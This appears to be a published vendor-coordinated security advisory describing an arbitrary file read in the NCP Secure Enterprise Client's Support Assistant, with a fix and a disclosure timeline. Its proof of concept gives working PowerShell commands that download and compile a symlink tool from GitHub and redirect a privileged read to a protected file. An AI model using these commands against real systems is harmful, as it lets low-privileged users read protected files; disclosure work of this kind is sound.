{"id":19530,"date":"2022-08-31T16:52:00","date_gmt":"2022-08-31T14:52:00","guid":{"rendered":"https:\/\/herolab.usd.de\/usd-2022-0003\/"},"modified":"2023-03-03T12:54:12","modified_gmt":"2023-03-03T11:54:12","slug":"usd-2022-0003","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2022-0003\/","title":{"rendered":"usd-2022-0003"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.17.1\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.17.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n<h1><\/h1>\n<h1>usd-2022-0003 | NCP Secure Enterprise Client - Arbitrary File Read<\/h1>\n<p><strong>Advisory ID:<\/strong> usd-2022-0003<br \/><strong>Product:<\/strong> NCP Secure Enterprise Client<br \/><strong>Affected Version:<\/strong> 12.22<br \/><strong>Vulnerability Type:<\/strong> Arbitrary File Read<br \/><strong>Security Risk:<\/strong> High<br \/><strong>Vendor URL:<\/strong>\u00a0https\/\/www.ncp-e.com\/<br \/><strong>Vendor Status:<\/strong> Fixed<\/p>\n<h3>Introduction<\/h3>\n<p>The <em>NCP Secure Enterprise<\/em> client is a <em>VPN<\/em> and networking application that is utilized by many organisations to connect workstations<br \/>to the cooperate network. The client supports a <em>Support Assistant<\/em> feature, which allows low privileged user accounts to obtain diagnostic<br \/>information from the operating system. After the corresponding information was collected, users can inspect the contents of the collected<br \/>files within the graphical user interface of the <em>NCP<\/em> application. Despite the graphical user interface runs with the permissions of the<br \/>current user, inspecting a diagnostic file causes a high privileged service to read the contents of it. After reading, the contents are send to<br \/>the graphical user interface of the <em>NCP<\/em> application and displayed to the invoking user.<\/p>\n<p>After the <em>Support Assistant<\/em> has collected the diagnostic files, they are stored within the directory <em><em>C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport*<\/em>.<br \/>This is also the directory where the high privileged service obtains the file contents from when files are inspected within the graphical<br \/>user interface. Since the directory is fully user controlled, low privileged users can use a <\/em>symbolic link* to redirect the read operation to<br \/>an arbitrary target.<\/p>\n<h3>Proof of Concept<\/h3>\n<p>The first step is to start the <em>Support Assistant<\/em> within the tray icon of the <em>NCP Secure Enterprise<\/em> client. The corresponding function<br \/>can be found in the upper right of the graphical user interface under the <em>Help<\/em> menu. After the <em>Support Assistant<\/em> has collected the<br \/>diagnostic information, the corresponding files are displayed within the graphical user interface:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/06\/support-assistant-1.png\" alt=\"\" class=\"wp-image-18540 alignnone size-full\" width=\"882\" height=\"415\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/06\/support-assistant-1.png 882w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/06\/support-assistant-1-480x226.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 882px, 100vw\" \/><\/p>\n<p>Now it is possible to replace one of the files with a <em>symbolic link<\/em> to an arbitrary target. In the following listing we replace the<br \/>file <strong>C:\\Users\\\\AppData\\Local\\Temp\\NCPSupport\\services.txt<\/strong> with a <em>symbolic link<\/em> pointing to <strong>C:\\Windows\\CCM\\CcmEval.xml<\/strong>.<br \/>Moreover, we demonstrate that the target file is not readable for a low privileged user account:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nb\" style=\"background: #263238;color: #82aaff\">PS <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">C<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:\\&gt;<\/span> <span class=\"nb\" style=\"background: #263238;color: #82aaff\">type <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">C<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">Windows<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">CCM<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">CcmEval<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">xml<\/span><br \/><span class=\"nb\" style=\"background: #263238;color: #82aaff\">type <\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">Der<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">Zugriff<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">auf<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">den<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">Pfad<\/span> <span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"C:\\Windows\\CCM\\CcmEval.xml\"<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">wurde<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">verweigert<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><br \/><span class=\"k\" style=\"background: #263238;color: #bb80b3\">In<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">Zeile<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">1<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">Zeichen<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">1<\/span><br \/><span class=\"p\" style=\"background: #263238;color: #89ddff\">+<\/span> <span class=\"nb\" style=\"background: #263238;color: #82aaff\">type <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">C<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">Windows<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">CCM<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">CcmEval<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">xml<\/span><br \/><span class=\"p\" style=\"background: #263238;color: #89ddff\">+<\/span> <span class=\"p\" style=\"background: #263238;color: #89ddff\">~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/span>    <span class=\"p\" style=\"background: #263238;color: #89ddff\">+<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">CategoryInfo<\/span>          <span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">PermissionDenied<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"p\" style=\"background: #263238;color: #89ddff\">(<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">C<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">Windows<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">CCM<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">CcmEval<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">xml<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">String<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">)<\/span> <span class=\"p\" style=\"background: #263238;color: #89ddff\">[<\/span><span class=\"nb\" style=\"background: #263238;color: #82aaff\">Get-Content<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">],<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">UnauthorizedAccessException<\/span>    <span class=\"p\" style=\"background: #263238;color: #89ddff\">+<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">FullyQualifiedErrorId<\/span> <span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">GetContentReaderUnauthorizedAccessError<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">Microsoft<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">PowerShell<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">Commands<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">GetContentCommand<\/span><span class=\"nb\" style=\"background: #263238;color: #82aaff\">PS <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">C<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:\\&gt;<\/span> <span class=\"nv\" style=\"background: #263238;color: #89ddff\">$code<\/span> <span class=\"p\" style=\"background: #263238;color: #89ddff\">=<\/span> <span class=\"p\" style=\"background: #263238;color: #89ddff\">(<\/span><span class=\"nb\" style=\"background: #263238;color: #82aaff\">iwr <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">https<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:\/\/<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">raw<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">githubusercontent<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">com<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">usdAG<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">SharpLink<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">main<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">SharpLink<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">cs<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">).<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">content<\/span><br \/><span class=\"nb\" style=\"background: #263238;color: #82aaff\">PS <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">C<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:\\&gt;<\/span> <span class=\"nb\" style=\"background: #263238;color: #82aaff\">Add-Type<\/span> <span class=\"nv\" style=\"background: #263238;color: #89ddff\">$code<\/span><br \/><span class=\"nb\" style=\"background: #263238;color: #82aaff\">PS <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">C<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:\\&gt;<\/span> <span class=\"nv\" style=\"background: #263238;color: #89ddff\">$s<\/span> <span class=\"p\" style=\"background: #263238;color: #89ddff\">=<\/span> <span class=\"nb\" style=\"background: #263238;color: #82aaff\">New-Object<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">de<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">usd<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">SharpLink<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">Symlink<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">(<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"C:\\Users\\&lt;USER&gt;\\AppData\\Local\\Temp\\NCPSupport\\services.txt\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span> <span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"C:\\Windows\\CCM\\CcmEval.xml\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">)<\/span><br \/><span class=\"nb\" style=\"background: #263238;color: #82aaff\">PS <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">C<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:\\&gt;<\/span> <span class=\"nv\" style=\"background: #263238;color: #89ddff\">$s<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">Open<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">()<\/span><br \/><span class=\"p\" style=\"background: #263238;color: #89ddff\">[+]<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">Creating<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">Junction<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">C<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">Users<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">\\&lt;<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">USER<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">AppData<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">Local<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">Temp<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">NCPSupport<\/span> <span class=\"p\" style=\"background: #263238;color: #89ddff\">-&gt;<\/span> <span class=\"p\" style=\"background: #263238;color: #89ddff\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">RPC<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">CONTROL<\/span><br \/><span class=\"p\" style=\"background: #263238;color: #89ddff\">[+]<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">Creating<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">DosDevice<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">Global<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">GLOBALROOT<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">RPC<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">CONTROL<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">services<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">txt<\/span> <span class=\"p\" style=\"background: #263238;color: #89ddff\">-&gt;<\/span> <span class=\"p\" style=\"background: #263238;color: #89ddff\">\\??\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">C<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">Windows<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">CCM<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">CcmEval<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">xml<\/span><br \/><span class=\"p\" style=\"background: #263238;color: #89ddff\">[+]<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">Symlink<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">setup<\/span> <span class=\"n\" style=\"background: #263238;color: #eff\">successfully<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><\/pre>\n<\/div>\n<p>Now it is time to inspect the file <strong>services.txt<\/strong> within the <em>Support Assistant<\/em> graphical user interface.<br \/>Clicking the corresponding file twice shows the contents of the targeted file:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/06\/poc-1.png\" alt=\"\" class=\"wp-image-18538 alignnone size-full\" width=\"1018\" height=\"468\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/06\/poc-1.png 1018w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/06\/poc-1-980x451.png 980w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/06\/poc-1-480x221.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1018px, 100vw\" \/><\/p>\n<h3>Fix<\/h3>\n<p>It is not evident why a high privileged service is used to display the obtained diagnostic information. The read operation<br \/>should be performed by the low privileged process instead, which also draws the graphical user interface.<\/p>\n<h3>References<\/h3>\n<ul>\n<li>https:\/\/www.ncp-e.com\/<\/li>\n<li>https:\/\/github.com\/usdAG\/SharpLink<\/li>\n<\/ul>\n<h3>Timeline<\/h3>\n<ul>\n<li><strong>2022-02-02<\/strong> First contact request via <a href=\"mailto:info-mv@ncp-e.com\">info-mv@ncp-e.com<\/a><\/li>\n<li>2022-02-02 Advisory transfered to the vendor<\/li>\n<li>2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities<\/li>\n<li>2022-06-09 Responsible Disclosure Team requests an update<\/li>\n<li>2022-06-21 Vendor annouces a new software release available in August<\/li>\n<li>2022-08-31 NCP Secure Enterprise Client 13.10 is released<\/li>\n<li>2023-03-03 This advisory is published<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p>These security vulnerabilities were found by Tobias Neitzel.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2022-0003 | NCP Secure Enterprise Client - Arbitrary File Read Advisory ID: usd-2022-0003Product: NCP Secure Enterprise ClientAffected Version: 12.22Vulnerability Type: Arbitrary File ReadSecurity Risk: HighVendor URL:\u00a0https\/\/www.ncp-e.com\/Vendor Status: Fixed Introduction The NCP Secure Enterprise client is a VPN and networking application that is utilized by many organisations to connect workstationsto the cooperate network. The client supports [&hellip;]<\/p>\n","protected":false},"author":109,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-19530","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/19530","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/109"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=19530"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/19530\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=19530"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}